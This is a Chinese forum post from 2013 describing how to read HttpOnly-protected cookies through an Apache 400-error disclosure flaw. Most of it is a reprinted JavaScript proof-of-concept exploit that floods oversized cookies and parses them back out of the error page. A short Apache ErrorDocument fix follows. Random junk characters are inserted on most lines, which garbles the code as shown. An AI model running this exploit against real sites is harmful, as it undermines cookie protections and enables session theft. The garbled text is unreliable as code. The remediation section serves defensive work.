很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。$ M5 A% t6 h0 O
7 n0 }9 c; ]7 D D" c
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
; B( A. v2 O/ P3 V" M
2 q. [; f0 ^) g* m) ~/ l" ]+ L& G5 Q6 X: J% Z+ E9 ^
// http://www.exploit-db.com/exploits/18442/
! v! `- ]2 p' q0 Y; d$ efunction setCookies (good) { l. {3 c, N5 o, G* U% [& `7 G* W" g
// Construct string for cookie value5 `, g4 r+ M1 k# g& ^ t
var str = "";
' v" E1 R7 L! ufor (var i=0; i< 819; i++) {
" ~# m' u: v {) Fstr += "x";
$ R0 C. B4 h R: n}
( I5 R1 n( e' S4 W. N; o6 h& M// Set cookies3 X V @, g5 [6 ?
for (i = 0; i < 10; i++) {
& p. d/ v8 `: H+ y' [// Expire evil cookie
6 T, C; `5 A7 f: f& Oif (good) {- O6 Y( }1 p/ G- l
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
: d2 s; M. L+ |7 O}
' e1 g' a2 H$ z: T, H// Set evil cookie8 c( l. u. }# G: e% C; m
else {
- C. ] Y# Q9 wvar cookie = "xss"+i+"="+str+";path=/";
' I4 Q8 j/ A" K* \}' w# ^3 \, V6 y6 `2 m2 R8 W+ n; y
document.cookie = cookie;& r* y w4 P1 R$ D
}
+ u, a# O( b& Z6 [}2 o# E. e- L& Y; R( i
function makeRequest() {
8 x7 b- A1 M' T6 |setCookies();
! {& F+ U4 h9 n2 z( {. cfunction parseCookies () {
* w' X J5 N6 Q8 {+ J3 Zvar cookie_dict = {};4 M; X" t1 `8 R* a
// Only react on 400 status3 Q: ^; g" N( F6 x h
if (xhr.readyState === 4 && xhr.status === 400) {
. }6 D( ^2 o$ a; t+ u/ V/ Y- X// Replace newlines and match <pre> content
0 }* I3 X8 w" U, w. ^! b8 e* Yvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
, d! K. D. h. G+ [* j2 W) aif (content.length) {: i! d0 `% N8 A
// Remove Cookie: prefix
& B! H |1 U* C" s8 w& P1 icontent = content[1].replace("Cookie: ", "");
; @8 i9 {* @; F! {, qvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);0 e) c. Y& o6 S+ a4 a" b- m% t3 R
// Add cookies to object4 ]$ w+ N% s" [( o% F% U
for (var i=0; i<cookies.length; i++) {
4 N. `; p( i( `1 ^# }* `0 Nvar s_c = cookies.split('=',2);
& L. Z# W1 V$ C pcookie_dict[s_c[0]] = s_c[1];
8 z) M4 w/ I1 J6 u5 \- W5 a% F}0 b8 v+ {5 j1 \' E0 B! ]
}* d& ?) k" C9 n. \
// Unset malicious cookies3 H8 P6 Z2 |$ g7 x+ y |# M
setCookies(true);
% @* R7 K$ b$ p x+ S6 oalert(JSON.stringify(cookie_dict));
& a9 E" j, H: m$ V3 v}
9 @% i) R2 w- m}
7 k. L- K) x9 ~; a6 K9 I1 ?$ G// Make XHR request
3 e4 r4 Y( a# w @; a* Tvar xhr = new XMLHttpRequest();, X& o9 T) S3 H! [2 e
xhr.onreadystatechange = parseCookies;/ Z) U9 t3 T% k. p& I, N, ?
xhr.open("GET", "/", true); @; i! b) K& j* e. f; l
xhr.send(null);* E- O% I: |2 J6 _1 s4 ~
}
' } p/ D! p, z6 i% j, n% f- qmakeRequest();
: c q( N H7 o/ @
. E4 [" ^* W3 t! y) J你就能看见华丽丽的400错误包含着cookie信息。# m/ E) F, v. e+ E- W; I& O" e/ i# l
8 P* m, q2 B1 Z( v5 d0 N
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#! I! z. Q" F# h. ?3 j5 p7 G c
. E+ K0 X ?) q) v4 K; r) M1 V. G修复方案:
# I4 i a2 b- j# y% Z2 w! r* c0 x. D/ b
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
3 Q. ^& \/ q9 |% p$ h% K
( f; C9 l; l7 Y4 ?# qIn the event of a problem or error, Apachecan be configured to do one of four things,. [' W- Z, s$ f5 Q3 c) e
' P* m/ q8 B& E: K8 {9 O1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
, P# y0 o$ h& O, q4 a* Y8 N2. output acustomized message输出一段信息3 _. o0 {2 u/ J& i% d& b. M4 X9 f
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 . R5 U% R1 x5 l1 l% O: M
4. redirect to an external URL to handle theproblem/error转向一个外部URL. v* x8 u$ y* i# G; _% d
* s% Z, L+ }+ f. T0 v, u
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容' C' w5 I1 q& z- [8 K
" L! c V }$ fApache配置:
' D6 k% }9 T7 \& k) h" o7 R
* o# y' g! w; t2 r! c. LErrorDocument400 " security test"" x9 ^7 K5 l( ]! u; y, i4 v
8 x& m! e5 U2 G; ^* H6 L
当然,升级apache到最新也可:)。
: { K" V3 X# q1 ^' u+ k+ k3 j6 t( V6 X% c2 l, X9 R5 x
参考:http://httpd.apache.org/security/vulnerabilities_22.html+ C8 l' W/ p9 K4 n, G
% z+ Q4 F: q) L
|
发表于 2013-4-19 19:15:43
收藏
支持
反对